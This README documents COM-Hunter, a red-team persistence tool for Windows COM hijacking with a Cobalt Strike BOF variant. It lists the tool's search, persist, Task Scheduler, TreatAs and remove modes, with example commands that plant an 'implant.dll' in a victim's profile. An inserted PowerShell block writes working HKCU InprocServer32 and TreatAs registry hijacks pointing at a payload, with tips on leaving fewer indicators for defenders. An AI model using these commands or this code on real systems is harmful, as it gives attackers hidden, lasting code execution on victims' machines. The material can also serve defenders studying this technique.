COM Hijacking VOODOO
COM-Hunter is a COM Hijacking persistence tool.
Available in both a .NET version and a BOF variant fully compatible with Cobalt Strike.
The following list explains the available modes:
- Search Mode: Searches for CLSIDs based on LocalServer32, InprocServer32, and registry entries under both HKLM and HKCU.
- Classic Persist Mode: Performs classic COM hijacking persistence using LocalServer32 or InprocServer32.
- Task Scheduler Mode: Automatically establishes COM hijacking persistence via Task Scheduler using LocalServer32 or InprocServer32.
- TreatAs Mode: Performs COM hijacking persistence via the TreatAs registry key and a fake (forwardable) CLSID using LocalServer32 or InprocServer32.
- Remove Mode: Removes persistence mechanisms that rely on LocalServer32, InprocServer32, and related registry entries under both HKLM and HKCU.
If you find any bugs, don’t hesitate to report them. Your feedback is valuable in improving the quality of this project!
The authors and contributors of this project are not liable for any illegal use of the tool. It is intended for educational purposes only. Users are responsible for ensuring lawful usage.
This project was created with ❤️ by @nickvourd && @S1ckB0y1337.
Special thanks to my friend Marios Gyftos for his invaluable assistance during the beta testing phase of this tool.
Inspired by the RTO course from @zeropointsecltd.
BOF implementation inspired by Lefteris Panos and his awesome project, RegPersist.
The base.c and bofdefs.h files are direct copies from TrustedSec's CS-Situational-Awareness-BOF project.
██████╗ ██████╗ ███╗ ███╗ ██╗ ██╗██╗ ██╗███╗ ██╗████████╗███████╗██████╗
██╔════╝██╔═══██╗████╗ ████║ ██║ ██║██║ ██║████╗ ██║╚══██╔══╝██╔════╝██╔══██╗
██║ ██║ ██║██╔████╔██║█████╗███████║██║ ██║██╔██╗ ██║ ██║ █████╗ ██████╔╝
██║ ██║ ██║██║╚██╔╝██║╚════╝██╔══██║██║ ██║██║╚██╗██║ ██║ ██╔══╝ ██╔══██╗
╚██████╗╚██████╔╝██║ ╚═╝ ██║ ██║ ██║╚██████╔╝██║ ╚████║ ██║ ███████╗██║ ██║
╚═════╝ ╚═════╝ ╚═╝ ╚═╝ ╚═╝ ╚═╝ ╚═════╝ ╚═╝ ╚═══╝ ╚═╝ ╚══════╝╚═╝ ╚═╝
Version: 3.0
@nickvourd && @S1ckB0y1337
~ Inspired during the RTO course by @zeropointsecltd ~
Usage: COM_Hunter.exe <mode> <options>
[+] Available Modes:
search Search Mode
persist Classic Persist Mode
tasksch Task Scheduler Mode
treatas TreatAs Mode
remove Remove Mode
[+] Search Mode:
Usage: COM-Hunter.exe search <CLSID> <options>
-a, --all Search DLL and EXE implementations in HKLM and HKCU
-i, --inprocserver32 Search DLL implementations in HKLM and HKCU
-l, --localserver32 Search EXE implementations in HKLM and HKCU
-m, --machine Search DLL and EXE implementations in HKLM
-u, --user Search DLL and EXE implementations in HKCU
[+] Classic Persist Mode:
Usage: COM-Hunter.exe persist <CLSID> <binary_path> <option>
-i, --inprocserver32 Set DLL implementation
-l, --localserver32 Set EXE implementation
[+] Task Scheduler Mode:
Usage: COM-Hunter.exe tasksch <binary_path> <option>
-i, --inprocserver32 Set DLL implementation
-l, --localserver32 Set EXE implementation
[+] TreatAs Mode:
Usage: COM-Hunter.exe treatas <CLSID> <fake_CLSID> <binary_path> <option>
-i, --inprocserver32 Set DLL implementation
-l, --localserver32 Set EXE implementation
[+] Remove Mode:
Usage: COM-Hunter.exe remove <CLSID> <options>
-a, --all Remove DLL and EXE implementations in HKLM and HKCU
-i, --inprocserver32 Remove DLL implementations in HKLM and HKCU
-l, --localserver32 Remove EXE implementations in HKLM and HKCU
-m, --machine Remove DLL and EXE implementations in HKLM
-u, --user Remove DLL and EXE implementations in HKCU
ℹ️ Search DLL and EXE implementations in HKLM and HKCU:
.\COM-Hunter.exe search 01575CFE-9A55-4003-A5E1-F38D1EBDCBE1 -a
ℹ️ Search EXE implementations in HKLM and HKCU:
.\COM-Hunter.exe search "{01575CFE-9A55-4003-A5E1-F38D1EBDCBE1}" -l
ℹ️ Search EXE implementations in HKLM only (the implementation and hive options can be combined):
.\COM-Hunter.exe search "{01575CFE-9A55-4003-A5E1-F38D1EBDCBE1}" -l --machine
ℹ️ Search EXE and DLL implementations in HKCU:
.\COM-Hunter.exe search AB8902B4-09CA-4bb6-B78D-A8F59079A8D5 --user
ℹ️ Perform classic persistence using DLL implementation:
.\COM-Hunter.exe persist AB8902B4-09CA-4bb6-B78D-A8F59079A8D5 C:\Users\victim\Desktop\implant.dll -i
ℹ️ Perform classic persistence using EXE implementation:
.\COM-Hunter.exe persist "{AB8902B4-09CA-4bb6-B78D-A8F59079A8D5}" C:\Users\victim\Desktop\implant.exe --localserver32
ℹ️ Perform persistence via Task Scheduler using DLL implementation:
.\COM-Hunter.exe tasksch C:\Users\victim\Desktop\implant.dll --inprocserver32
ℹ️ Perform persistence via the TreatAs registry key and a fake (forwardable) CLSID using DLL implementation:
.\COM-Hunter.exe treatas AB8902B4-09CA-4bb6-B78D-A8F59079A8D5 "{00000012-1312-1997-2605-F38D1EBDCBE1}" C:\Users\victim\Desktop\implant.dll -i
ℹ️ Remove DLL implementation persistence in HKCU:
.\COM-Hunter.exe remove AB8902B4-09CA-4bb6-B78D-A8F59079A8D5 -i -u
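To see what the persist, treatas and remove invocations above change on the host, the following added example (plain PowerShell, not COM-Hunter's code) writes and reverts the equivalent per-user registry state in a lab. The CLSID, fake CLSID and DLL path are the README's sample values; the ThreadingModel value is this example's choice, and the resolver follows only a single TreatAs hop.

```powershell
# Added example, not COM-Hunter's code: the per-user registry state that Classic
# Persist Mode and TreatAs Mode produce, written with plain PowerShell so the
# footprint can be inspected in a lab and reverted (Remove Mode equivalent).
# CLSID, fake CLSID and DLL path are the README's sample values; the
# ThreadingModel value is this example's choice.
$Target    = '{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}'
$Fake      = '{00000012-1312-1997-2605-F38D1EBDCBE1}'
$Payload   = 'C:\Users\victim\Desktop\implant.dll'
$UserClsid = 'Registry::HKEY_CURRENT_USER\Software\Classes\CLSID'
$HkcrClsid = 'Registry::HKEY_CLASSES_ROOT\CLSID'

function Set-UserComServer {
    # Classic persistence: HKCU\Software\Classes\CLSID\<clsid>\InprocServer32 (DLL)
    # or LocalServer32 (EXE). No admin rights are needed, and because HKCR reads
    # HKCU before HKLM this entry wins for the user's medium-integrity processes.
    param(
        [Parameter(Mandatory)][string]$Clsid,
        [Parameter(Mandatory)][string]$Path,
        [Parameter(Mandatory)][ValidateSet('InprocServer32', 'LocalServer32')][string]$Kind
    )
    $key = New-Item -Path "$UserClsid\$Clsid\$Kind" -Force   # -Force creates the parent keys
    Set-ItemProperty -Path $key.PSPath -Name '(default)' -Value $Path
    if ($Kind -eq 'InprocServer32') {
        # An in-process server declares its apartment model; 'Both' lets an STA
        # or MTA client load the DLL directly.
        Set-ItemProperty -Path $key.PSPath -Name 'ThreadingModel' -Value 'Both'
    }
}

function Set-UserTreatAs {
    # TreatAs: the target CLSID's own server keys stay untouched. COM reads
    # HKCR\CLSID\<target>\TreatAs and activates the fake CLSID instead, whose
    # server entry points at the payload.
    param(
        [Parameter(Mandatory)][string]$Clsid,
        [Parameter(Mandatory)][string]$FakeClsid,
        [Parameter(Mandatory)][string]$Path,
        [Parameter(Mandatory)][ValidateSet('InprocServer32', 'LocalServer32')][string]$Kind
    )
    Set-UserComServer -Clsid $FakeClsid -Path $Path -Kind $Kind
    $key = New-Item -Path "$UserClsid\$Clsid\TreatAs" -Force
    Set-ItemProperty -Path $key.PSPath -Name '(default)' -Value $FakeClsid
}

function Remove-UserComEntry {
    # Remove Mode equivalent: drop the per-user class so HKCR falls back to HKLM.
    param([Parameter(Mandatory)][string]$Clsid)
    Remove-Item -Path "$UserClsid\$Clsid" -Recurse -Force -ErrorAction SilentlyContinue
}

function Resolve-ComServer {
    # Where the merged HKCR view resolves a CLSID right now, following one
    # TreatAs hop, which is what a COM client activating the class would see.
    param([Parameter(Mandatory)][string]$Clsid)
    if (Test-Path -Path "$HkcrClsid\$Clsid\TreatAs") {
        $Clsid = (Get-ItemProperty -Path "$HkcrClsid\$Clsid\TreatAs").'(default)'
    }
    foreach ($kind in 'InprocServer32', 'LocalServer32') {
        if (Test-Path -Path "$HkcrClsid\$Clsid\$kind") {
            return "$Clsid $kind -> $((Get-ItemProperty -Path "$HkcrClsid\$Clsid\$kind").'(default)')"
        }
    }
    return "$Clsid has no server registered"
}

# Lab walkthrough: apply each mode, observe the resolution, then revert.
Set-UserComServer -Clsid $Target -Path $Payload -Kind InprocServer32
Resolve-ComServer -Clsid $Target      # the payload DLL, for this user only
Remove-UserComEntry -Clsid $Target
Resolve-ComServer -Clsid $Target      # back to the HKLM registration, if any

Set-UserTreatAs -Clsid $Target -FakeClsid $Fake -Path $Payload -Kind InprocServer32
Resolve-ComServer -Clsid $Target      # forwarded to the fake CLSID's payload
Remove-UserComEntry -Clsid $Target
Remove-UserComEntry -Clsid $Fake
```

Two caveats when validating this against a real target: elevated (high-integrity) processes ignore per-user COM registrations, so a HKCU hijack only fires in the user's medium-integrity processes; and the cleanup must remove both the TreatAs key on the target and the fake CLSID, otherwise an orphaned per-user class with a server path under a user profile remains as an easy indicator for defenders.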
ℹ️ Requires the MinGW-w64 toolchain (x86_64-w64-mingw32-gcc and i686-w64-mingw32-gcc)
ℹ️ Compile the BOF objects for both architectures:
./make_all.sh
This will:
- Create the com_hunter_* directories.
- Compile com_hunter_*.x64.o and com_hunter_*.x86.o.
- Move both object files into the com_hunter_*/ directories.
ℹ️ After compiling the BOF modules, simply load com_hunter_bof.cna into Cobalt Strike.
ℹ️ To clean build artifacts, go into each src directory and execute:
make clean
- Persistence: “the continued or prolonged existence of something”: Part 2 – COM Hijacking by MDSec
- Abusing the COM Registry Structure (Part 2): Hijacking & Loading Techniques by BOHOPS
- Userland Persistence with Scheduled Tasks and COM Handler Hijacking by Enigma0x3
- COM Objects Hijacking by Virus Total
- CS-Remote-OPs-BOF GitHub Repository by TrustedSec
- A Developer's Introduction to Beacon Object Files by TrustedSec
- BOF Development & Tradecraft Course by Zeropoint Security
